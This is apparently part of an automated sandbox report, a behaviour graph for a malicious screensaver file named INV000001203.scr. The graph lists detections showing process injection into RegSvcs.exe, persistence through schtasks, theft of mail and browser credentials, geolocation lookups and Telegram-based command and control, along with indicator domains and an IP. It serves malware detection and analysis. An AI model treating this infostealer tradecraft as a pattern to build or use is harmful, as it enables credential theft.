          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1638255 Sample: INV000001203.scr Startdate: 14/03/2025 Architecture: WINDOWS Score: 100 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 10 other signatures 2->55 7 INV000001203.scr 1 11 2->7         started        11 taskeng.exe 1 2->11         started        process3 file4 31 C:\Users\user\AppData\...\bZqCbFmlynN.exe, PE32 7->31 dropped 33 C:\Users\...\bZqCbFmlynN.exe:Zone.Identifier, ASCII 7->33 dropped 35 C:\Users\user\AppData\Local\...\tmp693F.tmp, XML 7->35 dropped 57 Uses schtasks.exe or at.exe to add and modify task schedules 7->57 59 Writes to foreign memory regions 7->59 61 Allocates memory in foreign processes 7->61 63 2 other signatures 7->63 13 RegSvcs.exe 12 2 7->13         started        17 powershell.exe 4 7->17         started        19 schtasks.exe 7->19         started        21 bZqCbFmlynN.exe 4 11->21         started        signatures5 process6 dnsIp7 43 api.telegram.org 13->43 45 checkip.dyndns.com 132.226.247.73, 49164, 49168, 49173 UTMEMUS United States 13->45 47 7 other IPs or domains 13->47 73 Tries to steal Mail credentials (via file / registry access) 13->73 75 Multi AV Scanner detection for dropped file 21->75 77 Writes to foreign memory regions 21->77 79 Allocates memory in foreign processes 21->79 83 2 other signatures 21->83 23 RegSvcs.exe 21->23         started        27 powershell.exe 21->27         started        29 schtasks.exe 21->29         started        signatures8 81 Uses the Telegram API (likely for C&C communication) 43->81 process9 dnsIp10 37 reallyfreegeoip.org 23->37 39 api.telegram.org 23->39 41 8 other IPs or domains 23->41 65 Tries to steal Mail credentials (via file / registry access) 23->65 67 Tries to harvest and steal browser information (history, passwords, etc) 23->67 signatures11 69 Tries to detect the country of the analysis system (by using the IP) 37->69 71 Uses the Telegram API (likely for C&C communication) 39->71

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.